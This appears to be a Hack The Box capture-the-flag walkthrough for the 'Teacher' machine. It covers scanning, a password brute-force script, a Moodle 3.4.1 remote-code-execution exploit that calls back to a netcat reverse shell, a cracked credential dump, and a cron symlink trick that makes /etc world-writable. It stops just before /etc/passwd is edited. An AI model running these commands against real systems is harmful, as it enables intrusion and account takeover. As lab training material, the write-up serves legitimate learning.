Teacher
Contents
Ports scan
u505@kali:~/HTB/Machines/Teacher$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.153 --rate=1000 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-02-17 15:06:13 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.153
u505@kali:~/HTB/Machines/Teacher$ nmap -sC -sV 10.10.10.153 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-17 10:06 EST Nmap scan report for teacher.htb (10.10.10.153) Host is up (0.038s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Blackhat highschool
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
Web enumeration
u505@kali:~/HTB/Machines/Teacher$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,png,css,js" -r -f -t 50 -u http://10.10.10.153 --plain-text-report=dirsearch.txt
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, png, css, js | HTTP method: get | Threads: 50 | Wordlist size: 23054 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-02-17_10-16-55.log
Target: http://10.10.10.153
[10:16:55] Starting: [10:16:55] 403 - 300B - /.htpasswd.css [10:16:55] 403 - 299B - /.htpasswd.js [10:16:59] 403 - 300B - /.htpasswd.png [10:16:59] 403 - 300B - /.htpasswd.txt [10:17:11] 200 - 931B - /css/ [10:17:19] 200 - 3KB - /fonts/ [10:17:23] 403 - 293B - /icons/ [10:17:23] 200 - 15KB - /images/ [10:17:26] 403 - 298B - /javascript/ [10:17:26] 200 - 1KB - /js/ [10:17:30] 200 - 626B - /manual/ [10:17:33] 200 - 26KB - /moodle/ [10:17:38] 403 - 298B - /phpmyadmin/ [10:17:48] 403 - 301B - /server-status/ [10:18:04] Starting: css/ [10:18:04] 403 - 304B - /css/.htpasswd.css [10:18:04] 403 - 303B - /css/.htpasswd.js [10:18:04] 403 - 304B - /css/.htpasswd.png [10:18:04] 403 - 304B - /css/.htpasswd.txt [10:18:48] 200 - 34KB - /css/style.css [10:18:57] Starting: fonts/ [10:18:57] 403 - 306B - /fonts/.htpasswd.png [10:18:57] 403 - 306B - /fonts/.htpasswd.txt [10:18:57] 403 - 306B - /fonts/.htpasswd.css [10:18:57] 403 - 305B - /fonts/.htpasswd.js [10:19:49] Starting: icons/ [10:19:50] 403 - 306B - /icons/.htpasswd.css [10:19:50] 403 - 305B - /icons/.htpasswd.js [10:19:50] 403 - 306B - /icons/.htpasswd.png [10:19:50] 403 - 306B - /icons/.htpasswd.txt [10:19:54] 200 - 306B - /icons/a.png [10:19:59] 200 - 308B - /icons/back.png [10:20:00] 200 - 310B - /icons/binary.png [10:20:01] 200 - 215B - /icons/blank.png [10:20:01] 200 - 320B - /icons/broken.png [10:20:02] 200 - 299B - /icons/c.png [10:20:06] 200 - 1KB - /icons/compressed.png [10:20:09] 200 - 295B - /icons/dir.png [10:20:10] 200 - 256B - /icons/down.png [10:20:13] 200 - 296B - /icons/f.png [10:20:14] 200 - 295B - /icons/folder.png [10:20:15] 200 - 308B - /icons/forward.png [10:20:16] 200 - 275B - /icons/generic.png [10:20:18] 200 - 332B - /icons/index.png [10:20:21] 200 - 323B - /icons/layout.png [10:20:21] 200 - 257B - /icons/left.png [10:20:21] 200 - 314B - /icons/link.png [10:20:24] 200 - 272B - /icons/movie.png [10:20:27] 200 - 298B - /icons/p.png [10:20:27] 200 - 310B - /icons/patch.png [10:20:27] 200 - 304B - /icons/pdf.png [10:20:28] 200 - 319B - /icons/portal.png [10:20:30] 200 - 303B - /icons/ps.png [10:20:32] 200 - 254B - /icons/right.png [10:20:32] 200 - 290B - /icons/script.png [10:20:34] 403 - 299B - /icons/small/ [10:20:37] 200 - 261B - /icons/tar.png [10:20:38] 200 - 288B - /icons/text.png [10:20:39] 200 - 334B - /icons/transfer.png [10:20:41] 200 - 255B - /icons/up.png [10:20:45] 200 - 1KB - /icons/xml.png [10:20:46] Starting: images/ [10:20:46] 403 - 307B - /images/.htpasswd.txt [10:20:46] 403 - 307B - /images/.htpasswd.png [10:20:47] 403 - 307B - /images/.htpasswd.css [10:20:47] 403 - 306B - /images/.htpasswd.js [10:20:48] 200 - 5KB - /images/1.png [10:20:48] 200 - 7KB - /images/2.png [10:20:48] 200 - 9KB - /images/3.png [10:20:48] 200 - 5KB - /images/4.png [10:20:49] 200 - 200B - /images/5.png [10:21:16] 200 - 4KB - /images/logo.png [10:21:43] Starting: javascript/ [10:21:43] 403 - 311B - /javascript/.htpasswd.txt [10:21:44] 403 - 310B - /javascript/.htpasswd.js [10:21:44] 403 - 311B - /javascript/.htpasswd.png [10:21:44] 403 - 311B - /javascript/.htpasswd.css [10:22:09] 403 - 305B - /javascript/jquery/ [10:22:37] Starting: js/ [10:22:38] 403 - 303B - /js/.htpasswd.txt [10:22:38] 403 - 303B - /js/.htpasswd.png [10:22:38] 403 - 302B - /js/.htpasswd.js [10:22:38] 403 - 303B - /js/.htpasswd.css [10:23:16] 200 - 3KB - /js/main.js [10:23:25] 200 - 44KB - /js/plugins.js [10:23:46] Starting: manual/ [10:23:47] 403 - 306B - /manual/.htpasswd.js [10:23:47] 403 - 307B - /manual/.htpasswd.png [10:23:47] 403 - 307B - /manual/.htpasswd.css [10:23:47] 403 - 307B - /manual/.htpasswd.txt [10:24:05] 200 - 9KB - /manual/da/ [10:24:06] 200 - 9KB - /manual/de/ [10:24:10] 200 - 9KB - /manual/en/ [10:24:11] 200 - 10KB - /manual/es/ [10:24:14] 200 - 9KB - /manual/fr/ [10:24:18] 200 - 10KB - /manual/images/ [10:24:21] 200 - 10KB - /manual/ja/ [10:24:22] 200 - 8KB - /manual/ko/ [10:24:43] 200 - 3KB - /manual/style/ [10:24:45] 200 - 9KB - /manual/tr/ [10:24:48] 200 - 9KB - /manual/zh-cn/ [10:24:48] Starting: moodle/ [10:24:49] 403 - 307B - /moodle/.htpasswd.png [10:24:49] 403 - 307B - /moodle/.htpasswd.css [10:24:49] 403 - 306B - /moodle/.htpasswd.js [10:24:49] 403 - 307B - /moodle/.htpasswd.txt [10:24:51] 200 - 1KB - /moodle/analytics/ [10:24:51] 303 - 448B - /moodle/admin/ [10:24:52] 200 - 0B - /moodle/auth/ [10:24:52] 200 - 4KB - /moodle/backup/ [10:24:53] 200 - 1B - /moodle/blocks/ [10:24:53] 200 - 3KB - /moodle/cache/ [10:24:53] 303 - 440B - /moodle/blog/ [10:24:54] 303 - 442B - /moodle/calendar/ [10:24:56] 303 - 440B - /moodle/comment/ [10:24:59] 200 - 27KB - /moodle/course/ [10:25:07] 303 - 440B - /moodle/files/ [10:25:07] 200 - 1B - /moodle/filter/ [10:25:14] 200 - 26KB - /moodle/index.php/ [10:25:15] 200 - 2KB - /moodle/install/ [10:25:17] 200 - 1KB - /moodle/lang/ [10:25:18] 200 - 1B - /moodle/lib/ [10:25:19] 200 - 1KB - /moodle/local/ [10:25:20] 200 - 27KB - /moodle/login/ [10:25:22] 200 - 1KB - /moodle/media/ [10:25:22] 303 - 440B - /moodle/message/ [10:25:23] 200 - 0B - /moodle/mod/ [10:25:24] 303 - 440B - /moodle/my/ [10:25:25] 303 - 440B - /moodle/notes/ [10:25:30] 200 - 7KB - /moodle/pix/ [10:25:31] 200 - 2KB - /moodle/portfolio/ [10:25:34] 200 - 6KB - /moodle/question/ [10:25:34] 200 - 1KB - /moodle/README.txt [10:25:35] 200 - 4KB - /moodle/report/ [10:25:35] 200 - 7KB - /moodle/repository/ [10:25:36] 200 - 1KB - /moodle/rss/ [10:25:36] 200 - 26KB - /moodle/search/ [10:25:42] 303 - 440B - /moodle/tag/ [10:25:43] 303 - 440B - /moodle/theme/ [10:25:48] 200 - 3KB - /moodle/webservice/ [10:25:51] Starting: phpmyadmin/ [10:27:11] Starting: server-status/
Task Completed
Moodle is a free and open-source learning management system (LMS) written in PHP and distributed under the GNU General Public License.[3][4] Developed on pedagogical principles,[5][6] Moodle is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors.[7][8][9]
With customizable management features, it is used to create private websites with online courses for educators and trainers to achieve learning goals.[10][11] Moodle (acronym for modular object-oriented dynamic learning environment) allows for extending and tailoring learning environments using community-sourced plugins.
Page gallery.tml
If we take a look at the code
u505@kali:~/HTB/Machines/Teacher$ '''curl http://teacher.htb/gallery.html'''
<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8 oldie" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en"> <!--<![endif]-->
<head>
<meta charset="utf-8">
<title>Blackhat Highschool</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no">
<link rel="stylesheet" media="all" href="css/style.css">
<!--[if lt IE 9]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<body>
...
<li>
<div class="slide">
<ul>
<li><a href="#"><img src="images/5.png" onerror="console.log('That\'s an F');" alt=""></a></li>
<li><a href="#"><img src="images/5_2.png" alt=""></a></li>
<li><a href="#"><img src="images/5_3.png" alt=""></a></li>
<li><a href="#"><img src="images/5_4.png" alt=""></a></li>
<li><a href="#"><img src="images/5_5.png" alt=""></a></li>
...
This image isn't rendered.
u505@kali:~/HTB/Machines/Teacher$ wget -q http://teacher.htb/images/5.png u505@kali:~/HTB/Machines/Teacher$ file 5.png 5.png: ASCII text u505@kali:~/HTB/Machines/Teacher$ cat 5.png Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks, Giovanni
Find moodle password with Burp
We need a list of characters to test the last letter of the password.
u505@kali:~/HTB/Machines/Teacher$ cat generatelist.sh
#!/bin/bash
for car in {{a..z},{A..Z},{0..9}}
do
echo $car
done
u505@kali:~/HTB/Machines/Teacher$ chmod +x generatelist.sh
u505@kali:~/HTB/Machines/Teacher$ ./generatelist.sh > list
u505@kali:~/HTB/Machines/Teacher$ cat /usr/share/seclists/Fuzzing/special-chars.txt >> list
We turn on burp suite to intercept the HTTP frame.
We send the packet to the Intruder module.
In the Intruder we delete all fields, we add one on the last character of the password, and remove the cookie line
On the payload tab, we load our list of characters, and start the attack.
During the attack, the length is always the same except for the character #
Find moodle password without Burp
An other way is to create our own script to check the password by command line.
u505@kali:~/HTB/Machines/Teacher$ vi testlogin.sh
u505@kali:~/HTB/Machines/Teacher$ cat testlogin.sh
NUM=1
cat list | while read car
do
USER=giovanni
PASS=Th4C00lTheacha${car}
POSTVAL="anchor=&username=${USER}&password=${PASS}"
LENPSTVAL=${#POSTVAL}
echo "Testing $USER $PASS" > result/test${NUM}.out
printf "Testing $USER $PASS"
MoodleSession=`curl -i -s -k -X 'GET' -H 'Host: 10.10.10.153' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' g -H 'DNT: 1' -H 'Connection: close' -H 'Upgrade-Insecure-Requests: 1' 'http://10.10.10.153/moodle/login/index.php' | grep "Set-Cookie: MoodleSession" | cut -d '=' -f 2 | cut -d ';' -f 1`
curl -i -s -k -X 'POST' -H 'Host: 10.10.10.153' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' g -H 'Referer: http://10.10.10.153/moodle/login/index.php' -H 'Content-Type: application/x-www-form-urlencoded' -H "Content-Length: ${LENPSTVAL}" -H 'DNT: 1' -H 'Connection: close' -H "Cookie: MoodleSession=${MoodleSession}" -H 'Upgrade-Insecure-Requests: 1' -b "MoodleSession=${MoodleSession}" --data-binary "${POSTVAL}" 'http://10.10.10.153/moodle/login/index.php' >> result/test${NUM}.out
printf " --- file name: test${NUM}.out -- file lenth: `ls -l result/test${NUM}.out | awk '{print $5}'` \n"
NUM=`expr $NUM + 1 `
done
u505@kali:~/HTB/Machines/Teacher$ chmod +x testlogin.sh
u505@kali:~/HTB/Machines/Teacher$ mkdir result
u505@kali:~/HTB/Machines/Teacher$ ./testlogin.sh
Testing giovanni Th4C00lTheachaa --- file name: test1.out -- file lenth: 834
Testing giovanni Th4C00lTheachab --- file name: test2.out -- file lenth: 834
...
Testing giovanni Th4C00lTheacha@ --- file name: test65.out -- file lenth: 834
Testing giovanni Th4C00lTheacha# --- file name: test66.out -- file lenth: 1028
Testing giovanni Th4C00lTheacha$ --- file name: test67.out -- file lenth: 834
./testlogin.sh: line 13: printf: `%': missing format character
Testing giovanni Th4C00lTheacha --- file name: test68.out -- file lenth: 834
Testing giovanni Th4C00lTheacha^ --- file name: test69.out -- file lenth: 834
...
Testing giovanni Th4C00lTheacha< --- file name: test92.out -- file lenth: 834
Testing giovanni Th4C00lTheacha> --- file name: test93.out -- file lenth: 834
We can see that the file length is different for password Th4C00lTheacha#. Our script fails for character %.
Moodle vulnerability
We have access to the moodle application as a teacher.
u505@kali:~/HTB/Machines/Teacher$ searchsploit moodle
---------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------- ----------------------------------------
Mambo Component Mam-Moodle alpha - Remote File Inclusion | exploits/php/webapps/2064.txt
Moodle - Remote Command Execution (Metasploit) | exploits/linux/remote/29324.rb
Moodle 1.1/1.2 - Cross-Site Scripting | exploits/php/webapps/24071.txt
Moodle 1.5.2 - 'moodledata' Remote Session Disclosure | exploits/php/webapps/3508.txt
Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Sc | exploits/php/webapps/29284.txt
Moodle 1.6dev - SQL Injection / Command Execution | exploits/php/webapps/1312.php
Moodle 1.7.1 - 'index.php' Cross-Site Scripting | exploits/php/webapps/30261.txt
Moodle 1.8.3 - 'install.php' Cross-Site Scripting | exploits/php/webapps/31020.txt
Moodle 1.8.4 - Remote Code Execution | exploits/php/webapps/6356.php
Moodle 1.9.3 - Remote Code Execution | exploits/php/webapps/7437.txt
Moodle 1.x - 'post.php' Cross-Site Scripting | exploits/php/webapps/24356.txt
Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting | exploits/php/webapps/35297.txt
Moodle 2.3.8/2.4.5 - Multiple Vulnerabilities | exploits/php/webapps/28174.txt
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site | exploits/php/webapps/36418.txt
Moodle 2.7 - Persistent Cross-Site Scripting | exploits/php/webapps/34169.txt
Moodle 2.x/3.x - SQL Injection | exploits/php/webapps/41828.php
Moodle 3.4.1 - Remote Code Execution | exploits/php/webapps/46551.php
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metas | exploits/php/remote/46775.rb
Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure | exploits/php/webapps/8297.txt
Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection | exploits/php/webapps/28770.txt
Moodle Filepicker 3.5.2 - Server Side Request Forgery | exploits/php/webapps/47177.txt
Moodle Help Script 1.x - Cross-Site Scripting | exploits/php/webapps/24279.txt
Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scrip | exploits/php/webapps/46881.txt
---------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Teacher$ searchsploit -m 46551
Exploit: Moodle 3.4.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/46551
Path: /usr/share/exploitdb/exploits/php/webapps/46551.php
File Type: C++ source, ASCII text, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Teacher/46551.php
To run this exploit we need a valid user and password of a teacher and a valid id of a course.
Raise listener
u505@kali:~/HTB/Machines/Teacher$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Execute evil teacher bug
u505@kali:~/HTB/Machines/Teacher$ php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass="Th4C00lTheacha#" ip=10.10.14.26 port=4444 course=2 PHP Notice: Undefined index: course in /opt/HTB/Machines/Teacher/46551.php on line 508
*------------------------------* * Noodle [Moodle RCE] (v3.4.1) * *------------------------------*
[!] Make sure you have a listener [!] at 10.10.14.26:4444
[*] Logging in as user giovanni with password Th4C00lTheacha# PHP Fatal error: Uncaught Error: Call to undefined function exploit\curl_init() in /opt/HTB/Machines/Teacher/46551.php:417 Stack trace: #0 /opt/HTB/Machines/Teacher/46551.php(105): exploit\moodle->httpPost('/login/index.ph...', Array) #1 /opt/HTB/Machines/Teacher/46551.php(84): exploit\moodle->login('http://10.10.10...', 'giovanni', 'Th4C00lTheacha#') #2 /opt/HTB/Machines/Teacher/46551.php(511): exploit\moodle->__construct('http://10.10.10...', 'giovanni', 'Th4C00lTheacha#', '10.10.14.26', '4444', NULL, false) #3 {main} thrown in /opt/HTB/Machines/Teacher/46551.php on line 417
We check the source code
u505@kali:~/HTB/Machines/Teacher$ vi +417 46551.php
$curl = curl_init(sprintf("%s%s", $this->url, $url));
The php module needs to be installed.
u505@kali:~/HTB/Machines/Teacher$ sudo apt install php-curl
And we run the exploit
u505@kali:~/HTB/Machines/Teacher$ php 46551.php url=http://10.10.10.153/moodle/ user=giovanni pass="Th4C00lTheacha#" ip=10.10.14.26 port=4444 course=2
*------------------------------* * Noodle [Moodle RCE] (v3.4.1) * *------------------------------*
[!] Make sure you have a listener [!] at 10.10.14.26:4444
[*] Logging in as user giovanni with password Th4C00lTheacha# [+] Successful Login [>] Moodle Session 94i0d563nrguesgdhddnbt02n6 [>] Moodle Key ekQgRg8Bfc [*] Loading Course ID 2 [+] Successfully Loaded Course [*] Enable Editing [+] Successfully Enabled Course Editing [*] Adding Quiz [+] Successfully Added Quiz [*] Configuring New Quiz [+] Successfully Configured Quiz [*] Loading Edit Quiz Page [+] Successfully Loaded Edit Quiz Page [*] Adding Calculated Question [+] Successfully Added Calculation Question [*] Adding Evil Question [+] Successfully Created Evil Question [*] Sending Exploit
[>] You should receive a reverse shell attempt from the target at 10.10.14.26 on port 4444 [>] If connection was successful this program will wait here until you close the connection. [>] You should be able to Ctrl+C and retain the connection through netcat.
And the listener open a reverse shell
u505@kali:~/HTB/Machines/Teacher$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.153. Ncat: Connection from 10.10.10.153:36368. /bin/sh: 0: can't access tty; job control turned off $ whoami www-data $ python -c "import pty;pty.spawn('/bin/bash')" www-data@teacher:/var/www/html/moodle/question$ stty raw -echo stty raw -echo
Local enumeration
As usual we upload tools to enumerate the local machine.
u505@kali:~/HTB/Machines/Teacher$ mkdir www u505@kali:~/HTB/Machines/Teacher$ cd www/ u505@kali:~/HTB/Machines/Teacher/www$ cp /opt/utils/pspy/pspy64 ./ u505@kali:~/HTB/Machines/Teacher/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/Teacher/www$ sudo python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
From the target box
www-data@teacher:/var/www/html/moodle/question$ cd /tmp/ www-data@teacher:/tmp$ wget -q http://10.10.14.26/pspy64 www-data@teacher:/tmp$ wget -q http://10.10.14.26/LinEnum.sh www-data@teacher:/tmp$ chmod +x pspy64 LinEnum.sh
The LinEnum.sh doesn't provide usefull information
www-data@teacher:/var/www/html/moodle$ cat config.php ... $CFG->dbname = 'moodle'; $CFG->dbuser = 'root'; $CFG->dbpass = 'Welkom1!'; ...
In the database moodle, we can access the mdl_user table
www-data@teacher:/var/www/html/moodle$ mysql -p -u root Enter password: Welkom1!
Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 102 Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use moodle Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [moodle]> select username,password from mdl_user; +-------------+--------------------------------------------------------------+ | username | password | +-------------+--------------------------------------------------------------+ | guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO | | admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 | | giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO | | Giovannibak | 7a860966115182402ed06375cf0a22af | +-------------+--------------------------------------------------------------+ 4 rows in set (0.00 sec)
There are 3 hash bcrypt that require a lot of math power, but the account Giovannibak, the password is a md5 that is very easy to run through a dictionary attack.
2020/02/17 20:11:01 CMD: UID=0 PID=1780 | /usr/sbin/CRON -f 2020/02/17 20:11:01 CMD: UID=0 PID=1781 | /usr/sbin/CRON -f 2020/02/17 20:11:01 CMD: UID=0 PID=1782 | /bin/sh -c /usr/bin/backup.sh 2020/02/17 20:11:01 CMD: UID=0 PID=1783 | tar -czvf tmp/backup_courses.tar.gz courses/algebra 2020/02/17 20:11:01 CMD: UID=0 PID=1784 | tar -czvf tmp/backup_courses.tar.gz courses/algebra 2020/02/17 20:11:01 CMD: UID=0 PID=1785 | gzip 2020/02/17 20:11:01 CMD: UID=0 PID=1786 | /bin/bash /usr/bin/backup.sh 2020/02/17 20:11:01 CMD: UID=0 PID=1787 | tar -xf backup_courses.tar.gz 2020/02/17 20:11:01 CMD: UID=0 PID=1788 | /bin/bash /usr/bin/backup.sh
Pspy allows us to dicover a periodic task that runs with root user.
www-data@teacher:/var/www/html/moodle$ cat /usr/bin/backup.sh #!/bin/bash cd /home/giovanni/work; tar -czvf tmp/backup_courses.tar.gz courses/*; cd tmp; tar -xf backup_courses.tar.gz; chmod 777 * -R;
But with user www-data, we are not allowed to go to these folders.
www-data@teacher:/var/www/html/moodle$ cd /home/giovanni/work
bash: cd: /home/giovanni/work: Permission denied
Crack of the hash
u505@kali:~/HTB/Machines/Teacher$ vi hash.txt u505@kali:~/HTB/Machines/Teacher$ cat hash.txt 7a860966115182402ed06375cf0a22af u505@kali:~/HTB/Machines/Teacher$ hashcat -m 0 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashcat (v5.1.0) starting...
* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss. You can use --force to override, but do not report related errors. nvmlDeviceGetFanSpeed(): Not Supported
OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 960M, 501/2004 MB allocatable, 5MCU
OpenCL Platform #2: The pocl project ==================================== * Device #2: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, skipped.
Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1
Applicable optimizers: * Zero-Byte * Early-Skip * Not-Salted * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Temperature abort trigger set to 90c
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=500 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll' * Device #1: Kernel m00000_a0-pure.408c2795.kernel not found in cache! Building may take a while...
Dictionary cache hit: * Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384
7a860966115182402ed06375cf0a22af:expelled
Session..........: hashcat Status...........: Cracked Hash.Type........: MD5 Hash.Target......: 7a860966115182402ed06375cf0a22af Time.Started.....: Mon Feb 17 14:04:13 2020 (0 secs) Time.Estimated...: Mon Feb 17 14:04:13 2020 (0 secs) Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 12721.4 kH/s (2.56ms) @ Accel:1024 Loops:1 Thr:64 Vec:1 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 983040/14344384 (6.85%) Rejected.........: 0/983040 (0.00%) Restore.Point....: 655360/14344384 (4.57%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: grass4 -> computer? Hardware.Mon.#1..: Temp: 43c Util: 17% Core:1137MHz Mem:2505MHz Bus:16
Started: Mon Feb 17 14:04:09 2020 Stopped: Mon Feb 17 14:04:15 2020
The password is cracked nearly instantly.
User flag
www-data@teacher:/var/www/html/moodle$ su - giovanni Password: expelled
giovanni@teacher:~$ whoami giovanni giovanni@teacher:~$ cat user.txt <USER_FLAG>
Privilege escalation
With user giovanni we can access the folder /home/giovanni/work.
giovanni@teacher:~/work$ cat /usr/bin/backup.sh #!/bin/bash cd /home/giovanni/work; tar -czvf tmp/backup_courses.tar.gz courses/*; cd tmp; tar -xf backup_courses.tar.gz; chmod 777 * -R;
This script is simple, we could for example make a link of folder /root and redirect it to folder /home/giovanni/work/courses. In that way we would be able to read the root flag. But we really won't own the machine. An other strategy could be to link the folder /home/giovanni/work/tmp to the folder /etc, because the command chmod 777 * -R will gave us full access to the folder /etc, and we can manipulate important file.
giovanni@teacher:~/work$ ls -ltr
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 tmp
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 courses
giovanni@teacher:~/work$ mv tmp tmp.old
giovanni@teacher:~/work$ ln -s /etc tmp
giovanni@teacher:~/work$ ls -la
total 16
drwxr-xr-x 4 giovanni giovanni 4096 Feb 17 20:24 .
drwxr-x--- 4 giovanni giovanni 4096 Nov 4 2018 ..
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 courses
lrwxrwxrwx 1 giovanni giovanni 4 Feb 17 20:24 tmp -> /etc
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27 2018 tmp.old
After the run of the cron job
2020/02/17 20:26:01 CMD: UID=0 PID=1958 | tar -czvf tmp/backup_courses.tar.gz courses/algebra
2020/02/17 20:26:01 CMD: UID=0 PID=1959 | gzip
2020/02/17 20:26:01 CMD: UID=0 PID=1960 | /bin/bash /usr/bin/backup.sh
2020/02/17 20:26:01 CMD: UID=0 PID=1961 | tar -xf backup_courses.tar.gz
2020/02/17 20:26:01 CMD: UID=0 PID=1962 | "chmod 777 adduser.conf adjtime alternatives analog.cfg apache2 apm apparmor.d apt backup_courses.tar.gz bash.bashrc bash_completion bash_completion.d bindresvport.blacklist binfmt.d ca-certificates ca-certificates.conf ca-certificates.conf.dpkg-old calendar console-setup courses cron.d cron.daily cron.hourly cron.monthly crontab cron.weekly dbconfig-common dbus-1 debconf.conf debian_version default deluser.conf dhcp dictionaries-common discover.conf.d discover-modprobe.conf dpkg emacs environment fail2ban fonts fstab fuse.conf gai.conf groff group group- grub.d gshadow gshadow- gss hdparm.conf host.conf hostname hosts hosts.allow hosts.deny init init.d initramfs-tools inputrc insserv.conf.d iproute2 issue issue.net kernel kernel-img.conf ldap ld.so.cache ld.so.conf ld.so.conf.d libaudit.conf lighttpd locale.alias locale.gen localtime logcheck login.defs logrotate.conf logrotate.d machine-id magic magic.mime mailcap mailcap.order manpath.config mime.types mke2fs.conf modprobe.d modules modules-load.d monit motd mtab mysql nanorc network networks newt nsswitch.conf opt os-release pam.conf pam.d passwd passwd- perl php phpmyadmin profile profile.d protocols python python2.7 python3 python3.5 rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rcS.d reportbug.conf resolv.conf rmt rpc rsyslog.conf rsyslog.d securetty security selinux services sgml shadow shadow- shells skel ssh ssl staff-group-for-usr-local subgid subgid- subuid subuid- sysctl.conf sysctl.d systemd terminfo timezone tmpfiles.d ucf.conf udev ufw update-motd.d vim vmware-tools wgetrc X11 xdg xml -R
2020/02/17 20:26:14 CMD: UID=0 PID=1963 |
The folder /etc is fully accessible. we can revert the action to let the script doing is original task
giovanni@teacher:~/work$ rm tmp
giovanni@teacher:~/work$ mv tmp.old tmp
giovanni@teacher:~/work$ cd /etc
giovanni@teacher:/etc$ ls -l passwd
-rwxrwxrwx 1 root root 1450 Jun 27 2018 passwd
We can now change the user id and gid of user giovanni
